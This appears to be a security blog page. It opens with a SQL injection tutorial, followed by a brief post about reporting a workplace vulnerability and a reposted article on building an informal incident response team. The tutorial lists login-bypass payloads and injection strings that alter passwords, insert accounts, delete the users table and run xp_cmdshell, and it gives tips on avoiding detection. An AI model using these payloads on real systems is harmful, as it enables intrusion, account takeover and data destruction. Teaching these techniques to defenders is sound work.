Patrick Talmadge

A major attack vector web programmers sometimes forget about is input cleansing. If user inputs are not cleansed prior to submitting the data to the SQL server attackers can submit malicious code to the server. This code can make the server return more data than it should or allow the attacker to delete entire databases.

SQL injection points occur anytime user inputs are not properly cleansed. The most common points of attack are login pages, search pages and URL strings. Attacks are not limited to these points of entry. All user input needs to be correctly cleansed to prevent SQL injection attacks.

SQL Injection Basics

SQL injections a simple in theory in which the attack finds an input that is trusted and passed to the SQL server. When the attacker finds a vulnerable input it is time to force the SQL query to return true no matter what the programmer is trying to do.

The most common way to force a SQL statement to return true is to add “‘ OR 1=1–” to a vulnerable input.

Code:
‘ OR 1=1—
Explanation:
‘ : Closes the string that the vulnerable input is looking for.
OR : a logical expression to start allow for another statement. The OR means that if the first statement fails because of the empty entry the entire statement may evaluate to true if the second statement is true.
1=1 : Since 1 will always equal 1 this expression will evaluate to true.
– : Is a comment which forces SQL to ignore everything after the – (dash dash).
Here are a few variations along the same lines as above:

admin’– ‘	or 0=0 –
” or 0=0 –	or 0=0 –
‘ or 0=0 # “	or 0=0 #
or 0=0 # ‘	or ‘x’='x
” or “x”=”x ‘)	or (’x'=’x
‘ or 1=1– “	or 1=1–
or 1=1– ‘	or a=a–
” or “a”=”a ‘)	or (’a'=’a
“) or (”a”=”a hack”	or “a”=”a
hack” or 1=1 — hack’	or 1=1 –
hack’ or ‘a’='a hack’)	or (’a'=’a
hack”)	or (”a”=”a

Update Data in Database

The ability to edit data in the database can allow attackers to change admin passwords. This attack can be done in a URL, a search box, a login page or any other unprotected input location. The following code sample shows how a password can be changed if the table name and an account are know.

Code:
‘; UPDATE ‘users’ SET ‘password’ = ‘hacked’ WHERE username=‘crackable’–

The above code updates the users table where the username is crackable. SET states that the password field for the username crackable will be changed to hacked.

Insert Data into Database

Inserting data into a database is very similar to updating the table. As with the Update this attack can be done in a URL, a search box, a login page or any other unprotected input location. The following example expects that the attacker knows the table and a general structure of the table.

Code:
‘; INSERT INTO ‘users’ (‘id’, ‘username’, ‘password’, ‘details’) VALUES (1203, ‘myaccount’, ‘mypassword’, ‘NA’)–

The above code inserts a new user into the users table. A new account is created with an id of 1203, username of myaccount, password of mypassword, and details of NA. Creating new accounts is less likely to be detected than changing the password of an existing account. If enough table information can be gained to insert a new account in the users database, it is preferred over updating an existing account. If table information cannot be obtained the next best thing would be to change a users password with an update.

Deleting Data from a Database

Deleting data from a database is very similar to updating and inserting data in a database table. As with the update and the insert this attack can be done in a URL, a search box, a login page or any other unprotected input location. The following code sample requires the attacker to know the table name.

Code:
‘; DELETE FROM ‘users’ –

The above code sample deletes all the data from the users table. In general an attacker would only use this delete command if they wanted to be purely destructive. This command will be discovered very quickly when users are unable to log into the website.

Remote Execution with SQL Injection (MS SQL)

SQL injections can be very powerful. This is an example of a SQL injection attack that can lead to remote execution. The default installation of MS SQL Server runs as local system, which is the same as Administrator. With the follow code stored procedures like master..xp_cmdshell can be executed which would allow and attacker to perform remote executions as if on the box.

Code:
‘; exec master..xp_cmdshell ‘ping 104.12.45.25′–

The semi colon in the statement will end the current SQL query and then allow a new SQL command. To verify that the command executed successfully, a packet sniffer can be used to sniff ICMP packets on 104.12.45.25. If packets are received at 104.12.45.25 from the SQL server the stored procedure was executed successfully.

Hacking, Security

The other week I found a major security hole in one of the systems at work. I notified my manager who then notified the correct people. I am waiting to see if this issue gets resolved. So far I have not seen any progress towards closing the hole. Lack of motivation to path security holes seems to be a major flaw in big business. That is till the security hole gets exploited, then it is scrabble time. 

I have done my part now it is up to the powers that be.

General, Security

Fun Article from the Security Catalyst. Full Article Here.

In addition to getting to break things in order to help our customers prevent assorted miscreants from doing so, one of the many hats I wear at QuietMove is the amorphous responsibility of ‘business development.’ In English, that means I identify organizations that could benefit from our services, sometimes travel to visit them, often buy them lunch, and explore ways we can help them. Though my background is technical, it’s something I’ve really grown to enjoy because I find it interesting to learn about different industries and business models and their unique security challenges.

That said, I’m often surprised by some of the organizations I visit – it’s shocking that some of the largest organizations in critical economic sectors don’t have security organizations, don’t have security programs, and don’t even have a single person for whom ‘security’ is part of their job description. In other cases, there’s a single ‘security’ person with no budget, staff, or authority. I’ve been that guy, so if that’s you, I feel your pain. I’d like to share an anecdote with you about a large company I visited last week who is in the former category – no security organization at all. If your organization has no security-focused staff, or if you’re the one guy or gal whose shoulders it all falls on, I’m also going to share a strategy for moving your organization in the right direction.

The Meeting

It was a pretty exciting morning – I was heading to an initial face-to-face meeting with a potential customer, one of the largest mining companies in the world. My initial contact was with a gentleman who managed their server environment. At my urging he also invited their application and network team. The meeting was scheduled to discuss assessment activities – something they haven’t been doing, and didn’t have the expertise or tools to do in-house. I asked him to invite the other managers because it was important to get their buy-in, and also because our customers get the best value when we test all attackable surface areas.

What I heard during the meeting was one of the variations on a common theme - each group ‘owned security’ for their sphere of responsibility, but there were no overarching standards, and minimal to no coordination. These guys were all professionals – the problem was organizational. Their company didn’t see a need for dedicated security resources.

Well OK, almost all professionals. One of them questioned what they had that was worth someone breaking in to steal. The look from his colleagues was as if he said his company possessed nothing of value, which is more or less what he said.

I pointed out a few things – they’re a mining company, so the list of what sites they are considering buying or leasing because their geological analysis said it would be a good spot was definitely worth something to their international competitors. Also valuable are their supplier lists, customer lists, and employee information, not to mention their reputation.

If it’s Everybody’s Job, it’s Nobody’s Job

Those who know me well, know I have a tendency to devolve a conversation into pedantic comparisons to obscure philosophical and/or historical topics. Lucky for you, Dear Readers, I’m too much of a lazy typist to inflict this habit on you – for too long.

The attitude at the mining company I visited was that security was “everyone’s” job. That may be, but without guidance from an accountable party, there is no incentive for anyone to perform something that they aren’t being measured against.

I’d like to paint a comparison to the relative physical security of a shopping mall vs. a public street. Shopping malls have a financial incentive to police their premises. After all, most people wouldn’t visit a mall after being mugged at spork-point in the food court after the first time, forget about the second. As a result, mall owners will set stricter codes of acceptable behavior on their premises than you’d see on a city street. Meanwhile people will litter the ground with cigarette butts, soda cans, and chewing gum in public places with a frequency you’d never see in their own home.

This is an important side effect of the concept of private property – with ownership comes responsibility. We see the same attitude in the workplace – when security is the responsibility of ‘everyone,’ it’s really owned by no one. People are measured on the performance of their primary job responsibility – meeting development deadlines, system uptime, etc. There is no central coordination of standards, no one who ‘owns’ testing controls, no security metrics, and ultimately little to no security.

Create a Security Team for $4.95, Plus Tax

That’s about the going rate for a dozen donuts. Yes, it’s that easy.

Back to the mining company – I realized that they had a long way to go. Since they didn’t have enough management buy-in for security to form a security organization, had no budget, and no ownership of responsibility, I shared a strategy whereby they could create one using the resources they have available now – themselves.

My suggestion was to pick trusted, interested persons as Single Points of Contact (SPOC) from key parts of their organization, schedule a conference room plus a dial-in conference bridge number for those at different locations, and invite them all to an informal monthly brown-bag lunch.

Pick out a news story related to a security incident or breach at another company from the news - a good place to look is the SC Magazine Breach Blog - and email it to everyone ahead of time. The purpose of the monthly lunch is to do some tabletop war gaming. What you’ll want to discuss is, if a similar incident affected your organization, how would you respond? What controls are in place to detect it? Who would be notified? What actions would be taken?

There are three goals for your Computer Incident Response Team (CIRT) meeting:

1. Identify a Single Point of Contact (SPOC) and backup contact for each part of the organization that should be involved in an incident or breach. In addition to identifying a contact and backup from system administration and network teams, don’t forget to pick points of contact from groups like telecom, finance, human resources, public relations, physical plant security, and any other towers you think you can pull in. Make a phone list, including cell phone numbers, and distribute it to all members.

 

2. Build an ad-hoc team that can respond to incidents, by building rapport and familiarity. This is an important point – a phone tree does not a team make. The team will learn to work together, and learn what roles they can play in incident response.

 

3. When (not if) an incident affects your organization, you will have already run through similar scenarios in your tabletop wargaming exercises. You’ll have a response team consisting of members of each part of your organization that might be affected. Most importantly, you’ll have the resources to effect a coordinated response.

Don’t forget the donuts. 

Security